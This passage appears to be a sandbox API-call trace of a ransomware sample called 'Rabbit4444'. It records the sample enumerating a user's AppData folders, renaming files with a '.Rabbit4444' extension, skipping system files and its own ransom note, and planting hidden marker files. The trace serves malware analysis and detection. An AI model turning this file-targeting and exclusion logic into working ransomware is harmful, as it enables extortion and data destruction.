0x29c [0068.727] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0068.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0068.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.728] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.728] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16003865572) returned 1 [0068.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0068.728] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.728] CloseHandle (hObject=0x29c) returned 1 [0068.728] CloseHandle (hObject=0x280) returned 1 [0068.728] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444") returned 193 [0068.728] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04.rabbit4444"), dwFlags=0x1) returned 1 [0068.758] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="Rabbit4444.exe") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".") returned 1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="..") returned 1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="windows") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="bootmgr") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="pagefile.sys") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="boot") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="ids.txt") returned -1 [0068.758] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="NTUSER.DAT") returned -1 [0068.758] lstrcpyW (in: lpString1=0x130ec22, lpString2="77EC63BDA74BD0D0E0426DC8F8008506" | out: lpString1="77EC63BDA74BD0D0E0426DC8F8008506") returned="77EC63BDA74BD0D0E0426DC8F8008506" [0068.758] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2020) returned 1 [0068.759] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2004) returned 1 [0068.759] lstrlenW (lpString="77EC63BDA74BD0D0E0426DC8F8008506") returned 32 [0068.759] lstrlenW (lpString="Rabbit4444") returned 10 [0068.759] lstrcmpiW (lpString1="C8F8008506", lpString2="Rabbit4444") returned -1 [0068.759] lstrlenW (lpString=".dll") returned 4 [0068.759] lstrcmpiW (lpString1="8506", lpString2=".dll") returned 1 [0068.759] lstrlenW (lpString=".lnk") returned 4 [0068.759] lstrcmpiW (lpString1="8506", lpString2=".lnk") returned 1 [0068.759] lstrlenW (lpString=".ini") returned 4 [0068.759] lstrcmpiW (lpString1="8506", lpString2=".ini") returned 1 [0068.759] lstrlenW (lpString=".sys") returned 4 [0068.759] lstrcmpiW (lpString1="8506", lpString2=".sys") returned 1 [0068.759] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="Rabbit4444.exe") returned -1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".") returned 1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="..") returned 1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="windows") returned -1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="bootmgr") returned 1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="pagefile.sys") returned -1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="boot") returned 1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="ids.txt") returned -1 [0068.759] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="NTUSER.DAT") returned -1 [0068.759] lstrcpyW (in: lpString1=0x130ec22, lpString2="FB0D848F74F70BB2EAA93746D24D9749" | out: lpString1="FB0D848F74F70BB2EAA93746D24D9749") returned="FB0D848F74F70BB2EAA93746D24D9749" [0068.759] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2020) returned 1 [0068.760] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2004) returned 1 [0068.768] lstrlenW (lpString="FB0D848F74F70BB2EAA93746D24D9749") returned 32 [0068.768] lstrlenW (lpString="Rabbit4444") returned 10 [0068.768] lstrcmpiW (lpString1="46D24D9749", lpString2="Rabbit4444") returned -1 [0068.768] lstrlenW (lpString=".dll") returned 4 [0068.768] lstrcmpiW (lpString1="9749", lpString2=".dll") returned 1 [0068.768] lstrlenW (lpString=".lnk") returned 4 [0068.768] lstrcmpiW (lpString1="9749", lpString2=".lnk") returned 1 [0068.768] lstrlenW (lpString=".ini") returned 4 [0068.768] lstrcmpiW (lpString1="9749", lpString2=".ini") returned 1 [0068.768] lstrlenW (lpString=".sys") returned 4 [0068.768] lstrcmpiW (lpString1="9749", lpString2=".sys") returned 1 [0068.768] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0068.768] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0068.768] lstrcpyW (in: lpString1=0x130ec22, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\content\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.769] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.769] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.770] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.770] CloseHandle (hObject=0x280) returned 1 [0068.770] CloseHandle (hObject=0x228) returned 1 [0068.770] GetCurrentThreadId () returned 0xd98 [0068.770] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0068.770] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory" [0068.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0068.770] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory" [0068.770] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\" [0068.770] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0068.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.223] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.226] FlushFileBuffers (hFile=0x228) returned 1 [0069.228] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0069.228] CloseHandle (hObject=0x228) returned 1 [0069.229] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory") returned 93 [0069.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.229] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0316e46, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf24fdcc4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0069.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.229] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.229] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.229] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.229] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0316e46, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf24fdcc4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.229] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.229] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.229] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.229] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.229] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.229] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf24fdcc4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf24fdcc4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf294ffa8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.229] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.229] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.229] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf24fdcc4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf24fdcc4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf294ffa8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0069.230] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0069.230] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0069.230] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0069.230] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.231] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.231] CloseHandle (hObject=0x29c) returned 1 [0069.231] CloseHandle (hObject=0x228) returned 1 [0069.231] GetCurrentThreadId () returned 0xd98 [0069.231] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fc8 [0069.231] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies" [0069.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0069.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0069.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies" [0069.231] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\" [0069.231] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0069.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.232] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.235] FlushFileBuffers (hFile=0x228) returned 1 [0069.236] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0069.236] CloseHandle (hObject=0x228) returned 1 [0069.236] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies") returned 93 [0069.236] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.236] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x466eaf94, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf297601b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0069.236] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.236] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.236] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.237] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.237] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x466eaf94, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf297601b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.237] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.237] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.237] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.237] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.237] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.237] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf297601b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf297601b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf297601b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.237] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.237] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.237] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc2b47205, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2b47205, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2b47205, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0069.237] lstrcmpiW 